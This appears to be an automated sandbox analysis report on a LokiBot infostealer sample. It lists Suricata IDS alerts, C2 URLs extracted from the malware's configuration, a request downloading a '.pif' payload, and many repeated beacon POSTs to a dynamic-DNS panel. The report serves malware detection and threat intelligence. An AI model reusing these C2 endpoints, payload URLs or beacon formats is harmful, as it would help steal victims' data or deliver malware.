Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49765 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49724 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49780 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49780 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49709 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49763
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49709 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49765 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49765 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49709
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49786 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49782 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49786 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49786 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49731 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49731 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49731 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49768 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49768 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49768 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49731 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49731 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49768 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49768 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49731
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49785 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49765
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49782 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49782 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49778 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49785 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49785 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49778 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49786 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49785
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49808 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49786 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49808 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49791 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49782 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49791 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49778 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49782 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49778 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49768
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49790 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49790 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49808 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49777 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49791 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49790 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49808 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49806 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49778
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49790 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49805
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49791 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49750 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49782
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49790 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49750 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49724 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49777 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49777 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49786
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49724 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49724 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49777 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49796 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49796 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49750 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49777 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49784 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49750 -> 45.149.241.169:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php

Uses dynamic DNS services

Source: unknown

DNS query: name: freighteighttwocam.ddns.net

Source: global traffic

HTTP traffic detected: GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1Host: www.sodiumlaurethsulfatedesyroyer.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: UUNETUS UUNETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
